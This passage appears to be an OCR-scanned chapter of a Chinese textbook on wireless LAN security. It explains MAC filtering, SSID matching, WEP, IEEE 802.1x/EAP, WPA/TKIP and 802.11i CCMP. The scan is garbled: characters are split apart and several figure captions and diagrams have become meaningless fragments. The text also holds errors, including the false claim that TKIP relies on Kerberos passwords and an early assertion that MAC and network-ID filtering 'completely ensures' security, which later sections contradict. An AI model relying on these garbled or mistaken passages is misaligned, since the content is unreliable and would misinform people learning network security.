在 无 线 环 境 中 ,非法 用 户 通过 侦 听 等 手段 获得 网 络 中 合法 站 点 的 MAC 地 址 比 有 线 环 
境 中 要 容易 得 多 ,这些 合法 的 MAC 地 址 可 以 被 用 来 进行 恶意 攻击 。 

另外 ,由 于 IEEE 802. 11 没有 对 AP 身份 进行 认证 ,非法 用 户 很 容易 装扮 成 AP 进入 网 
络 , 并 进一步 获取 合法 用 户 的 鉴别 身份 信息 ,通过 会 话 拦截 实现 网 络 入侵 。 


14.32 无 线 局 域 网 的 安全 技术 


无 线 局 域 网 的 安全 技术 包括 物理 地 址 (MAC) 过 滤 、 服 务 区 标志 符 (SSID) 匹 配 、 连 线 对 
等 保密 (WEP) .端口 访问 控制 (IEEE 802. 1x) .WPA IEEE 802. 11i 等 。 

目前 ,无 线 局 域 网 络 产 品 主要 采用 的 是 IEEE 802. 11b 国际 标准 。IEEE 802. 11 标准 主 
要 采用 三 项 安全 技术 来 保障 无 线 局 域 网 数据 传输 的 安全 。 第 一 项 为 SSID (Service Set 
Identifier) 技 术 ,该 技术 可 以 将 一 个 无 线 局 域 网 分 为 几 个 需要 不 同 身份 验证 的 子 网 络 , 每 一 
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个 子 网 络 都 需要 独立 的 身份 验证 ,只 有 通过 身份 验证 的 用 户 才 可 以 进入 相应 的 子 网 络 ,防止 
未 被 授权 的 用 户 进 入 网 络 ; 第 二 项 为 MAC(Media Access Control) 技 术 ,应 用 这 项 技术 ,可 
在 无 线 局 域 网 的 每 一 个 接 入 点 (Access Point,AP) 下 设置 一 个 许可 接 入 的 用 户 的 MAC 地 
址 清单 ,MAC 地 址 不 在 清单 中 的 用 户 , 接 入 点 将 拒绝 其 接 入 请 求 ; 第 三 项 为 WEP(Wired 
Equivalent Privacy) 加 密 技术 ,WEP 安全 技术 源 自 于 名 为 RC4 的 RSA 数据 加 密 技术 ,以 满 
足 用 户 更 高 层次 的 网 络 安全 需求 。 

目前 ,这 些 技术 已 发 展 成 熟 并 得 到 了 充分 应 用 。 例 如 Intel 公司 就 推出 的 11Mb/s 无 线 
LAN 产品 系列 ,就 全 面 支持 WEP 的 密码 编码 功能 ,用 最 长 128 位 的 密码 键 对 数据 进行 编 
码 后 ,在 AP 适配器 上 进行 通信 ,密码 键 长 度 可 选择 40 位 或 128 位 。 利 用 MAC 地 址 和 预 设 
网 络 ID 来 限制 哪些 网 卡 和 接 人 点 可 以 连 入 网 络 ,完全 可 以 确保 网 络 安全 。 对 于 那些 非法 的 
接收 者 来 说 , 截 听 无 线 局 域 网 的 信号 是 非常 困难 的 ,从 而 可 以 有 效 地 防止 黑客 和 入 侵 者 的 
攻击 。 

此 外 已 广泛 应 用 于 局 域 网 络 及 远程 接 人 等 领域 的 VPN(Virtual Private Networking) 
安全 技术 也 可 用 于 无 线 局 域 网 络 ,与 IEEE 802. 11b 标准 所 采用 的 安全 技术 不 同 ,VPN 主要 
采用 DES、3DES 等 技术 来 保障 数据 传输 的 安全 。 对 于 安全 性 要 求 更 高 的 用 户 , 可 以 将 现 有 
的 VPN 安全 技术 与 IEEE 802. 11b 安全 技术 结合 起 来 ,这 是 目前 较为 理想 的 无 线 局 域 网 络 
的 安全 解决 方案 。 下 面 对 在 无 线 局 域 网 中 常用 的 安全 技术 进行 简介 。 


1. 物理 地 址 (MAC) 过 滤 


每 个 无 线 客户 端 网 卡 都 由 唯一 的 48b 物理 地 址 (MAC) 标 志 , 可 在 AP 中 手工 维护 一 组 
允许 访问 的 MAC 地 址 列表 ,实现 物理 地 址 过 滤 。 物 理 地 址 过 滤 属 于 硬件 认证 ,而 不 是 用 户 
认证 。 这 种 方式 要 求 AP 中 的 MAC 地 址 列表 必须 随时 更 新 。 如 果 用 户 增加 , 则 扩展 能 力 变 
差 ,其 效率 会 随 着 终端 数目 的 增加 而 降低 ,因此 只 适用 于 小 型 网 络 规模 。 

非法 用 户 通过 网 络 侦 听 就 可 获得 合法 的 MAC 地 址 表 , 而 MAC 地 址 并 不 难 修改 ,因而 
非法 用 户 完全 可 以 通过 盗用 合法 用 户 的 MAC 地 址 非法 接 人 。 物 理 地 址 过 滤 如 图 14. 8 
所 示 。 


MAC 地 址 控制 接 入 表 
MAC 000FE201EC5D 
MAC 000FE20166AD 
MAC 000FE201500C 


MAC 000FE20166BE 


MAC 000FE201EC5D 
14.8 MAC 地 址 过 滤 
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2. 服务 区 标识 符 (SSID) 匹 配 


无 线 客户 端 必须 设置 与 无 线 访问 点 AP 相同 的 SSID 才能 访问 AP。 利 用 SSID 设置 ， 
可 以 很 好 地 进行 用 户 群 体 分 组 ,避免 任意 漫游 带 来 的 安全 和 访问 性 能 降低 的 问题 。 可 以 通 
过 设置 隐藏 接 入 点 (AP) 及 SSID 区 域 的 划分 和 权限 控制 来 达到 保密 的 目的 ,因此 可 以 认为 
SSID 是 一 个 简单 的 口令 ,通过 提供 口令 认证 机 制 ,确保 一 定 程 度 的 安全 。 服 务 区 标志 匹配 
如 图 14.9 所 示 。 


图 14.9 服务 区 标识 匹配 


如 果 配 置 AP 向 外 广播 其 SSID, 那 么 安全 程度 将 下 降 ; 因为 一 般 情况 下 用 户 自己 配置 
客户 端 系统 ,很 多 人 都 知道 该 SSID, 所 以 很 容易 共享 给 非法 用 户 。 

有 的 厂家 支持 所 有 SSID 方式 ,只 要 无 线 工作 站 在 某 个 AP 范围 内 ,客户 端 都 会 自动 连 
接 到 AP, 这 将 跳 过 SSID 安全 功能 。 


3. 连 线 对 等 保密 (WEP) 


在 IEEE 802. 11 中 ,定义 了 WEP 来 对 无 线 传输 的 数据 进行 加 密 ,WEP 的 核心 是 RC4 
算法 。 在 标准 中 ,加 密 密 钥 长 度 有 64 位 和 128 位 两 种 。 其 中 有 24 位 是 由 系统 产生 的 ,需要 
在 AP 和 Station 上 配置 的 密 钥 就 只 有 40 位 或 104 位 。WEP 加 密 原 理 如 图 14. 10 所 示 。 


初始 化 向 量 S| 
(IV) 一 一 | | WEP 密 钥 序列 
密 钥 -| PRNG @ 一 | 窗 文 
明文 一 一 | 一 
[完整 性 算法 | 一 一 = 
完整 性 校 验 (ICV) 消息 


图 14.10 WEP 加 密 原理 图 
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信息 阐述 中 的 加 密 过 程 如 下 : 

@ AP 先 产 生 一 个 初始 化 向 量 (IV) ,将 其 同 密 钥 串 接 (IV 在 前 ) 作 为 WEP Seed, 采 用 
RC4 算法 生成 和 待 加 密 数 据 等 长 (长 度 为 MPDU 长 度 加 上 ICV 的 长 度 ) 的 密 钥 序列 ; 

@ 计算 待 加 密 的 MPDU 数据 校 验 值 完整 性 检验 (ICV) 值 ,将 其 串 接 在 MPDU 之 后 ; 

@ 将 上 述 两 步 的 结果 按 位 异 或 生成 加 密 数据 ; 

@ 加 密 数据 前 面 有 四 个 字 节 ,存放 IV 和 Key 


加 密 信息 
om 过半 a nm 
ID,IV 占 前 三 个 字 节 ,Key ID 在 第 四 字 节 的 高 两 位 ， 


IV 数据 ICV 
其 余 的 位 置 为 0; 如 果 使 用 Key-mapping Key, 则 未 | CoD | 了 
Key ID 为 0, 如 果 使 用 Default Key, 则 Key ID 为 密 \、 ~ 
钥 索引 (0 一 3 其 中 之 一 )。 \ ~ 
加 密 后 的 输出 如 图 14. 11 所 示 。 初始 化 向 量 Fe 
注意 : 加 密 过 程 将 原来 的 MPDU 扩展 38B, 其 a 6 位 | 2 位 


中 4B 是 IV, 另 外 4B 是 ICV。ICV 只 对 数据 域 做 ”图 14.11 WEP 加 密 后 的 MPDU 格式 
校 验 。 
加 密 前 的 数据 帧 格式 如 图 14. 12 所 示 。 


MAC 地 址 信息 | 数据 部 分 (PDU) | ” 帧 检验 序列 


14.12 加密 前 数据 格式 
加 密 后 的 数据 帧 格式 如 图 14. 13 所 示 。 


MAC 地 址 信息 IV “| 数据 部 分 (PDU) | ICV 帧 检验 序列 


14.13 ”加 密 后 数据 格式 
WEP 解密 原理 图 如 图 14. 14 所 示 。 


i 密 钥 序 列 明文 

Iv 一 中， PRNG -< [RY 

密 文 ICV Lcv=cv| 

消息 

14.14 WEP 解密 原理 图 

信息 传输 中 的 解密 过 程 如 下 : 
Q 找到 解密 密 钥 ; 
@ 将 密 钥 和 IV 串 接 (IV 在 前 ) 作 为 RC4 算法 的 输入 生成 和 待 解密 数据 等 长 的 密 钥 


序列 ; 
@ 将 密 钥 序列 和 待 解密 数据 按 位 异 或 ,最 后 4B 是 ICV ,前 面 是 数据 明文 ; 
@ 对 数据 明文 计算 校 验 值 ICV' ,并 和 ICV 比较 ,如 果 相 同 则 解密 成 功 ,否则 丢弃 该 数据 。 
WEP 使 用 RC4 流 密 码 来 保证 数据 的 保密 性 ,通过 共享 密 钥 来 实现 认证 ,理论 上 增加 了 
网 络 侦 听 和 会 话 截获 的 攻击 难度 。 但 由 于 其 使 用 固定 的 加 密 密 钥 和 过 短 的 初始 向 量 , 该 方 
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法 已 被 证 实 存在 严重 的 安全 漏洞 ,这 些 安全 漏洞 和 WEP 对 加 密 算 法 的 使 用 机 制 有 关 , 即 使 
增加 密 钥 长 度 也 不 可 能 增加 安全 性 。 

另外 ,WEP 缺少 密 钥 管理 ,用 户 的 加 密 密 钥 必须 与 AP 的 密 钥 相同 ,并 且 一 个 服务 区 内 
的 所 有 用 户 都 共享 同一 把 密 钥 ,WEP 中 没有 规定 共享 密 钥 的 管理 方案 ,通常 需要 手工 进行 
配置 与 维护 。 由 于 同时 更 换 加 密 密 钥 和 AP 密 钥 的 费时 与 困难 ,所 以 密 钥 通 常 很 少 更 换 , 倘 
若 一 个 用 户 丢失 密 钥 , 则 会 束 及 到 整个 网 络 的 安全 。 


4. 端口 访问 控制 技术 (IEEE 802. 1x) 和 可 扩展 认证 协议 (EAP) 


IEEE 802. 1x 并 不 是 专 为 WLAN 设计 的 。 它 是 一 种 基于 端口 的 访问 控制 技术 。 当 无 
线 工 作 站 STA 与 无 线 访问 点 AP 关联 后 ,是 否 可 以 使 用 AP 的 服务 要 取决 于 IEEE 802. 1x 
的 认证 结果 。 如 果 认 证 通过 , 则 AP 为 STA 打开 这 个 逻辑 端口 ,否则 不 允许 用 户 连接 网 络 。 

IEEE 802. 1x 提供 无 线 客 户 端 与 RADIUS 服务 器 之 间 的 认证 ,而 不 是 客户 端 与 无 线 接 
入 点 AP 之 间 的 认证 ; 采用 的 用 户 认 证 信息 仅仅 是 用 户 名 与 口令 ,在 存储 、 使 用 和 认证 信息 
传输 中 存在 很 大 安全 隐患 ,如 泄漏 .丢失 ; 无 线 接 人 点 AP 与 RADIUS 服务 器 之 间 基于 共享 
密 钥 (完成 认证 过 程 中 协商 出 的 会 话 密 钥 ) 进 行 传输 ,该 共享 密 钥 为 静态 ,存在 一 定 的 安全 
隐患 。 

IEEE 802. 1x 协议 仅仅 关注 端口 的 打开 与 关闭 ,对 于 合法 用 户 ( 根 据 账 号 和 密码 ) 接 入 
时 ,该 端口 打开 ,而 对 于 非法 用 户 接 入 或 没有 用 户 接 入 时 , 则 该 端口 处 于 关闭 状态 。 认 证 的 
结果 在 于 端口 状态 的 改变 ,而 不 涉及 通常 认证 技术 必须 考虑 的 IP 地 址 协商 和 分 配 问 题 ,是 
各 种 认证 技术 中 最 简化 的 实现 方案 。IEEE 802. 1x 端口 控制 如 图 14. 15 所 示 。 


发 出 请 求 的 认证 系统 


客户 端 (PAE) | EAP| 认证 服务 器 


未 授权 端口 


| 网 络 (包括 无 线 网 络 ) | 


14.15 IEEE 802. 1x 端口 控制 


在 IEEE 802. 1x 协议 中 ,只 有 具备 了 以 下 三 个 要 素 才 能 够 完成 基于 端口 的 访问 控制 的 
用 户 认 证 和 授权 。 

(1) 客户 端 

一 般 安 装 在 用 户 的 工作 站 上 , 当 用 户 有 上 网 需求 时 ,激活 客户 端 程序 ,输入 必要 的 用 户 
名 和 口令 ,客户 端 程序 将 会 发 出 连接 请 求 。 

(2) 认证 系统 

在 无 线 网 络 中 就 是 无 线 接 入 点 AP 或 者 具有 无 线 接 人 点 AP 功能 的 通信 设备 。 其 主要 
作用 是 完成 用 户 认证 信息 的 上 传 .下 达 工 作 , 并 根据 认证 的 结果 打开 或 关闭 端口 。 

(3) 认证 服务 器 

通过 检验 客户 端 发 送 来 的 身份 标志 (用 户 名 和 口令 ) 来 判断 用 户 是 否 有 权 使 用 网 络 系统 
提供 的 服务 ,并 根据 认证 结果 向 认证 系统 发 出 打开 或 关闭 端口 。 
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在 具有 IEEE 802. 1x 认证 功能 的 无 线 网 络 系统 中 , 当 一 个 WLAN 用 户 需要 对 网 络 资 
源 进行 访问 之 前 必须 先 要 完成 以 下 的 认证 过 程 。 

Q@ 当 用 户 有 网 络 连接 需求 时 打开 IEEE 802. 1x 客户 端 程序 ,输入 已 经 登记 过 的 用 户 名 
和 口令 ,发 出 连接 请 求 。 此 时 ,客户 端 程序 将 发 出 请 求 认证 的 报 文 给 AP, 启 动 一 次 认证 。 

@ AP 收 到 请 求 认证 的 数据 帧 后 ,将 发 出 一 个 请 求 帧 要 求 用 户 的 客户 端 程序 将 输入 的 
用 户 名 发 送 过 来 。 

@ 客户 端 程序 响应 AP 发 出 的 请 求 , 将 用 户 名 信息 通过 数据 帧 送 给 AP。AP 将 客户 端 
送 上 来 的 数据 帧 经 过 封包 处 理 后 送 给 认证 服务 器 进行 处 理 。 

@ 认证 服务 器 收 到 AP 转发 上 来 的 用 户 名 信息 后 ,将 该 信息 与 数据 库 中 的 用 户 名 表 相 
比较 ,找到 该 用 户 名 对 应 的 口令 信息 ,用 随机 生成 的 一 个 加 密 字 对 它 进 行 加 密 处 理 ,同时 也 
将 此 加 密 字 传送 给 AP, 由 AP 传 给 客户 端 程序 。 

@ 客户 端 程序 收 到 由 AP 传 来 的 加 密 字 后 ,用 该 加 密 字 对 口令 部 分 进行 加 密 处 理 ( 加 
密 算 法 通常 是 不 可 逆 的 ) ,并 通过 AP 传 给 认证 服务 器 。 

@ 认证 服务 器 将 送 上 来 的 加 密 后 的 口令 信息 和 其 自己 经 过 加 密 运 算 后 的 口令 信息 进 
行 对 比 ,如 果 相同 , 则 认为 该 用 户 为 合法 用 户 , 反 馈 认证 通过 的 消息 ,并 向 AP 发 出 打开 端口 
的 指令 ,允许 用 户 的 业务 流通 过 端口 访问 网 络 。 否 则 ,反馈 认证 失败 的 消息 ,并 保持 AP 端 
口 的 关闭 状态 ,只 允许 认证 信息 数据 通过 而 不 允许 业务 数据 通过 ，。 

这 里 要 提出 的 一 个 值得 注意 的 地 方 是 : 在 客户 端 与 认证 服务 器 交换 口令 信息 的 时 候 ， 
没有 将 口令 以 明文 直接 送 到 网 络 上 进行 传输 ,而 是 对 口令 信息 进行 了 不 可 逆 的 加 密 算法 处 
理 , 使 在 网 络 上 传输 的 敏感 信息 有 了 更 高 的 安全 保障 ,避免 了 由 于 下 级 接 入 设备 所 具有 的 广 
播 特性 而 导致 敏感 信息 泄漏 的 问题 。IEEE 802. 1x 认证 过 程 如 图 14. 16 所 示 。 


局 旧 J 


发 出 请 求 的 客户 端 认证 服务 器 Radius 服 务 器 
802.11 RADIUS 
1: Association request 


2: Association response 


3: EAPOL-Start EAPOL 


4: Request/Identity 

5: Response/Identity 5: Radius-Access-Request 
一 

6: EAP-Request 6: Radius-Access-Challenge 


7: EAP-Response 7: Radius-Access-Request 
一 | 一 | 

8: EAP-Success 8: Radius-Access-Accept 

9: EAPOL-Key(WEP) 


图 14.16 IEEE 802. 1x 认证 过 程 


IEEE 802. 1x 要 求 无 线 工作 站 安装 IEEE 802. 1x 客户 端 软 件 ,无 线 访问 点 要 内 髓 
IEEE 802. 1x 认证 代理 ,同时 它 还 作为 RADIUS 客户 端 ,将 用 户 的 认证 信息 转发 给 
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RADIUS 服务 器 。 
IEEE 802. 1x 除 提供 端口 访问 控制 能 力 之 外 ,还 提供 基于 用 户 的 认证 系统 及 计 费 ,特别 
适合 于 公共 无 线 接 人 解决 方案 。 


5. WPA(Wi-Fi Protected Access) 


WPA 可 以 认为 是 由 IEEE 802. 1x、.EAP、TKIP、MIC 组 成 。 在 IEEE 802. 11i 标准 最 终 
确定 前 ,WPA 标准 是 代替 WEP 的 无 线 安全 协议 标准 ,为 IEEE 802. 11 无 线 局 域 网 提供 更 
强大 的 安全 性 能 。WPA 是 IEEE 802. 11i 的 一 个 子 集 ,其 核心 是 IEEE 802. 1x 和 TKIP。 

(1) 认证 

在 IEEE 802. 11 中 几乎 形同虚设 的 认证 阶段 ,到 了 WPA 中 变 得 尤为 重要 起 来 , 它 要 求 
用 户 必 须 提供 某 种 形式 的 证 据 来 证 明 它 是 合法 用 户 , 并 拥有 对 某 些 网 络 资源 的 访问 权限 ,并 
且 是 强制 性 的 。 

WPA 的 认证 分 为 两 种 。 一 种 是 采用 IEEE 802. 1x 十 EAP 的 方式 ,用 户 提供 认证 所 需 
的 凭证 ,如 用 户 名 密码 ,通过 特定 的 用 户 认证 服务 器 (一 般 是 RADIUS 服务 器 ) 来 实现 。 在 
大 型 企业 网 络 中 ,通常 采用 这 种 方式 。 但 是 对 于 一 些 中 小 型 的 企业 网 络 或 者 家 庭 用 户 ,架设 
一 台 专 用 的 认证 服务 器 过 于 昂贵 ,日 常 维护 也 很 复杂 ,因此 WPA 提供 另 一 种 简化 的 模式 ， 
它 不 需要 专门 的 认证 服务 器 , 仅 要 求 在 每 个 WLAN 结 点 (AP, 无 线路 由 器 ,网 卡 等 ) 预 先 输 
入 一 个 密 钥 即 可 实现 ,这 种 模式 叫做 WPA 预 共 享 密 钥 (WPA-PSK)。 只 要 密 钥 吻 合 ,客户 
就 可 以 获得 WLAN 的 访问 权 。 由 于 这 个 密 钥 仅仅 用 于 认证 过 程 ,而 不 用 于 加 密 过 程 ,因此 
不 会 导致 诸如 使 用 WEP 密 钥 来 进行 IEEE 802. 11 共享 认证 产生 的 安全 问题 。 

(2) 加 密 

WPA 采用 TKIP 为 加 密 引 入 了 新 的 机 制 , 它 使 用 一 种 密 钥 构架 和 管理 方法 ,通过 由 认 
证 服务 器 动态 生成 分 发 的 密 钥 来 取代 单个 静态 密 钥 ,把 密 钥 首部 长 度 从 24 位 增加 到 48 位 
等 方法 增强 安全 性 ,而 且 TKIP 利用 了 IEEE 802. 1x/EAP 构架 。 认 证 服务 器 在 接收 用 户 
身份 后 ,使 用 802. 1x 产生 一 个 唯一 的 主 密 钥 处 理会 话 , 然 后 TKIP 把 这 个 密 钥 通过 安全 通 
道 分 发 到 AP 和 客户 端 ,并 建立 起 一 个 密 钥 构架 和 管理 系统 ,使 用 主 密 钥 为 用 户 会 话 动态 产 
生 一 个 唯一 的 数据 加 密 密 钥 来 加 密 每 一 个 无 线 通信 数据 报 文 。TKIP 的 密 钥 构架 使 WEP 
静态 单一 的 密 钥 变 成 了 500 万 亿 个 可 用 密 钥 。 虽然 WPA 采用 的 还 是 和 WEP 一 样 的 RC4 
加 密 算法 ,但 其 动态 密 钥 的 特性 很 难 被 攻破 。 

TKIP 与 WEP 一 样 基 于 RC4 加 密 算法 ,但 相 比 WEP 算法 ,将 密 钥 的 长 度 由 40 位 增加 
到 128 位 ,初始 化 向 量 IV 的 长 度 由 24 位 加 长 到 48 位 ,并 对 现 有 的 WEP 进行 了 改进 , 即 追 
加 了 “每 发 一 个 包 重 新 生成 一 个 新 的 密 钥 (Per Packet Key)”“ 消 息 完整 性 检查 (MIC)”“ 具 
有 序列 功能 的 初始 向 量 ” 和 *“ 密 钥 生 成 和 定期 更 新 功能 ”四 种 算法 , 极 大 地 提高 了 加 密 安全 
强度 。 

标准 工作 组 认为 : 因为 作为 安全 关键 的 加 密 部 分 ,TKIP 没有 脱离 WEP 的 核心 机 制 ， 
而 且 TKIP 甚至 更 易 受 攻击 ,因为 它 采 用 了 Kerberos 密码 ,常常 可 以 用 简单 的 猜测 方法 攻 
破 。 另 一 个 严重 问题 是 加 /解密 处 理 效率 问题 没有 得 到 任何 改进 。 

Wi-Fi 联盟 和 IEEE 802 委员 会 也 承认 ,TKIP 只 能 作为 一 种 临时 的 过 渡 方案 , 而 IEEE 
802. 11i 标准 的 最 终 方案 是 基于 IEEE802. 1x 认证 的 CCMP(CBC-MAC Protocol) 加 密 技 
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术 , 即 以 AES(Advanced Encryption Standard) 为 核心 算法 。 它 采用 CBC-MAC 加 密 模式 ， 
具有 分 组 序号 的 初始 向 量 。CCMP 为 128 位 的 分 组 加 密 算 法 , 相 比 前 面 所 述 的 所 有 算法 安 
全 程度 更 高 。 

(3) 消息 完整 性 校 验 (MIC) 

是 为 了 防止 攻击 者 从 中 间 截 获 数据 报 文 、 算 改 后 重 发 而 设置 的 。 除 了 和 IEEE 802. 11 
一 样 继续 保留 对 每 个 数据 分 段 (MPDU) 进 行 CRC 检验 外 ,WPA 为 IEEE802. 11 的 每 个 数 
据 分 组 (MSDU) 都 增加 了 一 个 8 个 字 节 的 消息 完整 性 校 验 值 。 这 和 IEEE802. 11 对 每 个 数 
据 分 段 (MPDU) 进 行 ICV 检验 的 目的 不 同 。ICYV 的 目的 是 为 了 保证 数据 在 传输 途中 不 会 
因为 噪声 等 物理 因素 导致 报 文 出 错 ,因此 采用 相对 简单 高 效 的 CRC 算法 ,但 是 黑客 可 以 通 
过 修改 ICV 值 来 使 之 和 被 算 改 过 的 报 文 相 吻 合 ,可 以 说 没有 任何 安全 的 功能 。 而 WPA 中 
的 MIC 则 是 为 了 防止 黑客 的 自 改 而 定制 的 , 它 采 用 Michael 算法 ,具有 很 高 的 安全 特性 。 
当 MIC 发 生 错误 的 时 候 , 数 据 很 可 能 已 经 被 算 改 ,系统 很 可 能 正在 受到 攻击 。 此 时 WPA 
还 会 采取 一 系列 的 对 策 , 如 立刻 更 换 组 密 钥 、 暂 停 活 动 60s 等 方法 来 阻止 黑客 的 攻击 。 


6. IEEE 802. 11i 


为 了 进一步 加 强 无 线 网 络 的 安全 性 和 保证 不 同 设备 之 间 无 线 安全 技术 的 兼容 ,IEEE 
802.11 工作 组 开发 了 作为 新 的 安全 标准 的 IEEE 802. 11i, 并 且 致 力 于 从 长 远 角度 考虑 解决 
IEEE 802. 11 无 线 局 域 网 的 安全 问题 。IEEE 802. 11i 标准 中 主要 包含 TKIP(Temporal 
Key Integrity Protocol) 和 AES(Advanced Encryption Standard) ,以 及 IEEE802. 1x 认证 协 
议 。IEEE 802. 11i 标准 已 在 2004 年 6 月 24 日 美国 新 泽 西 的 IEEE 标准 会 议 上 正式 获得 
批准 。 

802.11i 与 WPA 相 比 增加 了 一 些 特性 : 

(1) 认证 

IEEE 802. 11i 的 安全 体系 也 使 用 802. 1x 认证 机 制 ,通过 无 线 客户 端 与 RADIUS 服务 
器 之 间 动 态 协 商 生 成 PMK (Pairwise Master Key), 再 由 无 线 客户 端 和 AP 之 间 在 这 个 
PMK 的 基础 上 经 过 四 次 握手 协商 出 单 播 密 钥 以 及 通过 两 次 握手 协商 出 组 播 密 钥 ,每 一 个 
无 线 客户 端 与 AP 之 间 通 信和 的 加 密 密 钥 都 不 相同 ,而 且 会 定期 更 新 密 钥 , 这 就 在 很 大 程度 上 
保证 了 通信 的 安全 ,其 协商 流程 如 图 14. 17 所 示 。 

图 14. 17 中 的 PTK 与 GTK 即 单 播 和 组 播 加 解密 使 用 的 密 钥 。 

(2) CCMP 加 密 

CCMP 提供 了 加 密 、 认 证 、 完 整 性 和 重 放 保护 。CCMP 是 基于 CCM 方式 。CCM 使 用 
了 AES(Advanced Encryption Standard) 加 密 算法 。CCM 方式 融合 了 用 于 加 密 的 Counter 
Mode(CTR) 和 用 于 认证 和 完整 性 的 加 密 块 连接 消息 认证 码 (Ciphy Block Chaing Message 
Autentication Code,CBC-MAC) 的 特性 。CCM 保护 MPDU 数据 和 IEEE 802. 11MPDU 帧 
头 部 分 域 的 完整 性 。 

AES 定义 在 FIPS PUB 197。 所 有 的 在 CCMP 中 用 到 的 AES 处 理 都 使 用 一 个 128 位 
的 密 钥 和 一 个 128 位 的 数据 块 。 其 中 CCM 方式 定义 在 RFC 3610。 

CCM 是 一 个 通用 模式 , 它 可 以 用 于 任意 面向 块 的 加 密 算 法 。CCM 有 两 个 参数 (M 和 L)， 
CCMP 使 用 以 下 值 作 为 CCM 参数 : M = 8, 表 示 MIC 为 8 个 字 节 ; L = 2; 表示 域 长 度 为 
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发 出 请 求 的 客户 端 认证 系统 


产生 SNonce 产生 ANonce 


消息 1 : EAPOL-Key(ANonce,Unicast) 


产生 PTK 


消息 2: EAPOL-Key(SNonce,Unicast,MIC) 


导出 PTK 
由 时 和 
消息 3 : EAPOL-Key(Install PTK，| 产生 GTK 时 ) 
Unicast,MIC,Encrypted GTK) 
消息 4，EAPOL-Key(UnicasbMIC) | 
安装 PTK 和 GTK 安装 PTK 


IEEE 802.1x 受 控 端口 
未 阻塞 


14.17 单 播 和 组 播 密 钥 协商 过 程 


2 个 字 节 。 这 有 助 于 保持 IEEE 802. 11MPDU 的 最 大 长 度 。 

针对 每 个 会 话 ,CCM 需要 有 一 个 全 新 的 临时 密 钥 。CCM 也 要 求 用 给 定 的 临时 密 钥 保 
护 的 每 帧 数据 有 唯一 的 Nonce 值 ,CCM 是 用 一 个 48 位 PN 来 实现 的 。 对 于 同样 的 临时 密 
钥 可 以 重用 PN ,这 可 以 减少 很 多 工作 。 

CCMP 用 16 个 字 节 扩展 了 原来 MPDU 的 大 小 ,其 中 8 个 字 节 为 CCMP 帧 头 ,8 个 字 节 
为 MIC 效 验 码 。CCMP 帧 头 由 PN、Ext IV 和 Key ID 域 组 成 。PN 是 一 个 48 位 的 数字 也 
是 一 个 6 字 节 的 数组 ,PN5 是 PN 的 最 高 字 节 ,PN0 是 最 低 字 节 。 值 得 注意 的 是 ,CCMP 不 
使 用 WEP ICV。CCMP MPDU 扩展 如 图 14. 18 所 示 。 


- 加 密 数据 =| 


CCMP 关 部 信息 共 8 字 节 ，。 | 数据 部 分 大 于 1 个 字 节 [MIC 8 字 节 


MAC 地 址 信息 FCS 4 字 闻 


| mso PN1 | 保留 保留 1V | 1D | | PN2 || PN3 | PN4 pns| 


图 14.18 CCMP MPDU 扩展 


Key ID 字 节 的 第 5 位 (Ext IV 域 ) ,表示 CCMP 扩展 帧 头 8 个 字 节 。 如 果 是 使 用 
CCMP 加 密 , 则 Ext IV 位 的 值 总 是 为 1。Key ID 字 节 的 第 6 和 7 位 是 为 Key ID 准备 的 。 
保留 的 各 个 位 值 为 0, 而 且 在 接收 的 时 候 被 忽略 掉 。 检 查 重 放 的 规则 如 下 : 

Q@ PN 值 连续 计算 每 一 个 MPDU。 
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@ 每 个 发 送 者 都 应 为 每 个 PTKSA、GTKSA 和 STAkeySA 维护 一 个 PN(48 位 的 计 
数 器 ) 。 

@ PN 是 一 个 48 位 的 单调 递增 正 整 数 ,在 相应 的 临时 密 钥 被 初始 化 或 刷新 的 时 候 , 它 
也 被 初始 化 为 1。 

@ 接收 者 应 该 为 每 个 PTKSA .GTKSA 和 STAKeySA 维护 一 组 单独 的 PN 重 放 计 数 
器 。 接 收 者 在 将 临时 密 钥 复位 的 时 候 , 会 将 这 些 计 数 器 置 0。 重 放 计数 器 被 设置 为 可 接收 
的 CCMP MPDU 的 PN 值 。 

@@ 接收 者 为 每 个 PTKSA、GTKSA 和 STAKeySA 维护 一 个 独立 的 针对 IEEE 802. 11 
MSDU 优先 级 的 重 放 计 数 器 ,并 且 从 接收 的 帧 中 获取 PN 来 检查 被 重 放 的 帧 。 在 重 放 计 数 
器 的 数目 时 ,不 使 用 IEEE 802. 11 MSDU 优先 级 。 发 送 者 不 会 在 重 放 计数 器 中 重 排 帧 ,但 
可 能 会 在 计数 器 外 重 排 帧 。IEEE 802. 11 MSDU 优先 级 是 可 能 的 重 排 帧 的 一 个 原因 。 

@ 如 果 MPDU 的 PN 值 不 连续 , 则 它 所 在 的 MSDU 整个 都 会 被 接收 者 抛弃 。 接 收 者 
同样 会 抛弃 任何 PN 值 小 于 或 者 等 于 重 放 计数 器 值 的 MPDU ,同时 增加 CCMP 的 重 放 计 数 


的 值 。 
CCMP 加 密 过 程 如 图 14. 19 所 示 。 
MAC 头 部 信息 
| 构造 AAD 一 一 | 加 密 后 
MPDU A2,Priority 的 数据 
一 一 一 | 构造 ,| 和 MIC 加 密 后 的 MPDU 
| |CCM 加 密 “| ee 
数据 2 
TK | 
“| 递 加 PN 
密 钥 ID 头 部 信息 
14. 19 CCMP 加 密 过 程 图 
CCMP 加 密 步骤 如 下 : 


QO@ 增加 PN 值 ,为 每 个 MPDU 产生 一 个 新 的 PN, 这 样 对 于 同一 个 临时 密 钥 TK 永远 
不 会 有 重复 的 PN。 需 要 注意 的 是 被 中 转 的 MPDU 在 中 转 过 程 中 是 不 能 被 修改 的 。 

@ MPDU 帧 头 的 各 个 域 用 于 生成 CCM 方式 所 需 的 AAD(Additional Authentication 
Data) 。CCM 运算 对 这 些 包 含 在 AAD 中 的 域 提供 了 完整 性 保护 。 在 传输 过 程 中 可 能 改变 
的 MPDU 头 部 各 个 域 在 计算 AAD 的 时 候 被 置 为 0。 

加 CCM Nonce 块 是 从 PN、A2(MPDU 地 址 2) 和 优先 级 构造 而 来 。 优 先 级 作为 保留 
值 设 为 0。 

@ 将 新 的 PN 和 Key ID 置 入 8 字 节 的 CCMP 头 部 。 

@@ CCM 最 初 的 处 理 使 用 临时 密 钥 TK、AAD、Nonce 和 MPDU 数据 组 成 密 文 和 MIC 。 

@ 加 密 后 的 MPDU 由 最 初 的 MPDU 帧 头 `.CCMP 头 部 、 加 密 过 的 数据 和 MIC 组 成 。 

当 AP 从 STA 接收 到 IEEE 802. 11 数据 帧 时 ,满足 以 下 条 件 则 进行 CCMP 解密 : 

Q@@ WPA/802. 11i、STA 协商 使 用 CCMP 加 密 ; 

@ Temp Key 已 经 协商 并 安装 完成 。 
